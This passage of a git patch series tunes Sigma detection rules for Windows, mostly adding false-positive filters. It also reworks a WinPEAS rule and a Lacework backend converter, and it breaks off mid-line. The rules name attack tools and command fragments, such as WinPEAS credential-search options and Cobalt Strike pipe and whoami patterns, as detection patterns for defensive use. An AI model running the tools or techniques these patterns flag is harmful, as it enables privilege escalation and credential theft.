tool level: high From 86a4f24ce8b085105c768b8f24ca6257669bfce0 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 22:36:18 +0200 Subject: [PATCH 65/96] del "domain" under CommandLine --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 92378f6ca..cc52a318a 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -27,7 +27,6 @@ detection: - OriginalFileName: 'winPEAS.exe' # always the same selection_cmd_args: - CommandLine|contains: - - 'domain' # Enumerate domain information - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information From 9bfd2c729fb9ba4c1261d8407a44266436ae2b1d Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:00:02 +0200 Subject: [PATCH 66/96] change condition and format --- .../process_creation/proc_creation_win_winpeas_tool.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index cc52a318a..d591a8b10 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - selection_img: + winpeas_basic: - Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same - selection_cmd_args: + winpeas_option: - CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information @@ -41,7 +41,7 @@ detection: filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' - condition: (selection_img or selection_cmd_args) and not filter_sysinfo + condition: 1 of winpeas_* and not filter_sysinfo fields: - Image - User From 9e589736c2d2e7c106ca6cc7560f942a9e5d7170 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 23:23:28 +0200 Subject: [PATCH 67/96] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d591a8b10..ee5604ae5 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -17,16 +17,16 @@ logsource: product: windows detection: winpeas_basic: - - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: 'winPEAS.exe' # always the same + OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +39,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + OriginalFileName: 'sysinfo.exe' condition: 1 of winpeas_* and not filter_sysinfo fields: - Image From 137653f08a89aa27893476562ccc585b2463703a Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:04:12 +0200 Subject: [PATCH 68/96] fix format and delete 'OriginalFileName' --- .../proc_creation_win_winpeas_tool.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index ee5604ae5..9696b83b3 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -5,8 +5,8 @@ description: WinPEAS is a script that search for possible paths to escalate priv author: Georg Lauenstein date: 2022/09/19 references: - - https://github.com/carlospolop/PEASS-ng - - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation tags: - attack.privilege_escalation - attack.t1082 @@ -17,16 +17,15 @@ logsource: product: windows detection: winpeas_basic: - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +38,7 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS condition: 1 of winpeas_* and not filter_sysinfo fields: - Image @@ -49,5 +47,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Should not be any as administrators do not use this tool + - Unlikely level: high From 2f7a54cc3176d0f9a0face8280509d0c65f9e044 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:20:33 +0200 Subject: [PATCH 69/96] Fix FP --- ...vent_win_notepad_plus_plus_persistence.yml | 6 ++-- ...oad_side_load_from_non_system_location.yml | 3 ++ .../image_load_uipromptforcreds_dlls.yml | 17 +++++++---- ...ccess_win_direct_syscall_ntopenprocess.yml | 14 ++++++++- ...tion_win_cobaltstrike_process_patterns.yml | 29 +++++++++++-------- .../proc_creation_win_mstsc.yml | 6 ++-- ...ation_win_ntfs_short_name_path_use_cli.yml | 7 +++-- .../proc_creation_win_reg_add_run_key.yml | 6 ++-- .../proc_creation_win_susp_curl_download.yml | 13 +++++++-- ...susp_direct_asep_reg_keys_modification.yml | 1 + ...ation_win_susp_explorer_break_proctree.yml | 11 +++++-- .../proc_creation_win_susp_image_missing.yml | 4 ++- .../proc_creation_win_susp_non_exe_image.yml | 3 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 5 +++- .../proc_creation_win_system_exe_anomaly.yml | 6 ++-- ...ion_win_windows_terminal_susp_children.yml | 4 +++ .../registry_event_runonce_persistence.yml | 2 +- 17 files changed, 98 insertions(+), 39 deletions(-) diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event @@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..de8fc8740 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -421,6 +421,9 @@ detection: filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..a9e409fd4 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/20 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -27,18 +27,23 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: Image|endswith: '\opera_autoupdate.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: '\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index e1587a4f6..c0a3ec60a 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/09/18 +modified: 2022/09/20 logsource: category: process_access product: windows @@ -32,6 +32,18 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml @@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..20df29533 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -25,7 +25,9 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown level: medium diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/09/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -22,8 +22,9 @@ detection: - '~2\' filter: - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe + - 'C:\Windows\System32\Dism.exe' + - 'C:\Windows\System32\cleanmgr.exe' + - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe' - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ef9ededa7..ad770a245 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -12,13 +12,15 @@ logsource: product: windows detection: selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg' - ' ADD ' - 'Software\Microsoft\Windows\CurrentVersion\Run' condition: selection falsepositives: - - Unknown + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. + - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 5ca802523..67f7c265e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/09/13 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -41,7 +41,16 @@ detection: - ' -O' # covers the alias for --remote-name and --output - '--remote-name' - '--output' - condition: selection_curl and 1 of selection_susp* + filter_git_windows: + ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe' + ParentCommandLine|contains|all: + - 'git-update-git-for-windows' + - '--quiet --gui' + Image: 'C:\Program Files\Git\mingw64\bin\curl.exe' + CommandLine|contains|all: + - '--silent --show-error --output ' + - 'gfw-httpget-' + condition: selection_curl and 1 of selection_susp* and not 1 of filter_* fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml index 421e0f538..fa812d78b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml @@ -29,6 +29,7 @@ fields: falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 880093006..64bd7a5e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml @@ -2,21 +2,26 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -author: Florian Roth, Nasreddine Bencherchali +author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ date: 2019/06/29 -modified: 2022/06/14 +modified: 2022/09/20 logsource: category: process_creation product: windows detection: selection: # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' + - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - 'explorer.exe' + - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index 05d19eed8..f01b13a1f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/03/08 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -25,9 +25,11 @@ detection: - Image: - 'Registry' - 'MemCompression' + - 'vmmem' - CommandLine: - 'Registry' - 'MemCompression' + - 'vmmem' condition: not image_absolute_path and not 1 of filter* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index d89582a80..e8b55f8fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/06/20 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -23,6 +23,7 @@ detection: Image: - 'Registry' - 'MemCompression' + - 'vmmem' filter_empty: Image: - '-' diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml index 7912a646f..911c0d961 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml @@ -11,7 +11,7 @@ tags: - attack.t1218 author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 -modified: 2022/08/23 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -32,6 +32,9 @@ detection: - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe' + - CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe' - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index e9ec591cf..14d2cd03e 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/09/07 +modified: 2022/09/20 tags: - attack.defense_evasion - attack.t1036 @@ -71,7 +71,9 @@ detection: - 'C:\Windows\WinSxS\' # - 'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - - Image: 'C:\Windows\explorer.exe' + - Image: + - 'C:\Windows\explorer.exe' + - 'C:\Program Files\PowerShell\7\pwsh.exe' condition: selection and not filter fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 38dea0b0b..92a7a55f9 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -47,6 +47,10 @@ detection: CommandLine|contains|all: - '\AppData\Local\Packages\Microsoft.WindowsTerminal_' - '\LocalState\settings.json' + filter_vsdevcmd: + CommandLine|contains|all: + - 'C:\Program Files\Microsoft Visual Studio\' + - '\Common7\Tools\VsDevCmd.bat' condition: all of selection_* and not 1 of filter_* falsepositives: - Other legitimate "Windows Terminal" profiles diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml index a998c6b34..1fc7bde2f 100644 --- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml +++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml @@ -17,7 +17,7 @@ detection: TargetObject|endswith: '\StubPath' filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' + Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' From cb09f9d522576dabfc2af60e4919bee331ce610b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:44:56 +0200 Subject: [PATCH 70/96] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 27 ++++++------------- 1 file changed, 8 insertions(+), 19 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 9696b83b3..0b34ea85c 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - winpeas_basic: + selection_basic: Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -24,28 +24,17 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - winpeas_option: - CommandLine|contains: - - 'systeminfo' # Search system information - - 'userinfo' # Search user information - - 'processinfo' # Search processes information + selection_pe: + OriginalFileName: 'winPEAS.exe' + selection_option: + - CommandLine|endswith: - 'serviceinfo' # Search services information - 'applicationsinfo' # Search installed applications information - - 'networkinfo' # Search network information - 'windowscreds' # Search windows credentials - 'browserinfo ' # Search browser information - - 'filesinfo ' # Search generic files that can contains credentials - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - - 'eventsinfo' # Display interesting events information - filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - condition: 1 of winpeas_* and not filter_sysinfo -fields: - - Image - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory + - CommandLine|contains: '.exe browserinfo ' # Search browser information + condition: 1 of selection* falsepositives: - - Unlikely + - Other programs that use the same command line flags level: high From 83fbd7f258a315417f4418f0f07700cd4abcfa7c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:45:13 +0200 Subject: [PATCH 71/96] Update proc_creation_win_winpeas_tool.yml --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 0b34ea85c..917e8fdba 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' selection_pe: - OriginalFileName: 'winPEAS.exe' + OriginalFileName: 'winPEAS.exe' selection_option: - CommandLine|endswith: - 'serviceinfo' # Search services information From ad6ddf5896d2032293e56d76a1e1821e9c6ae7b2 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Tue, 20 Sep 2022 13:47:17 -0500 Subject: [PATCH 72/96] feat(backend): add support for linux.network_connection Also remove evaluatorId --- tools/sigma/backends/lacework.py | 104 ++++++++++++++++++------------- 1 file changed, 61 insertions(+), 43 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index f3c5eb870..df4e60f0c 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( textwrap.dedent(''' --- - version: 0.3 + version: 0.4 services: cloudtrail: - evaluatorId: Cloudtrail source: CloudTrailRawEvents fieldMap: - sigmaField: eventName @@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load( alertProfile: LW_CloudTrail_Alerts product.categories: linux.file_create: - evaluatorId: - source: LW_HE_FILES + sources: + - LW_HE_FILES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load( - OWNER_USERNAME - FILE_CREATED_TIME alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation + linux.network_connection: + sources: + - LW_HA_CONNECTION_SUMMARY as HACM + - array_to_rows(ENDPOINT_DETAILS) as (EP_PA) + fieldMap: + - sigmaField: Image + laceworkField: EXE_PATH + matchType: exact + action: selfjoin + selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }} + - sigmaField: DestinationIp + laceworkField: 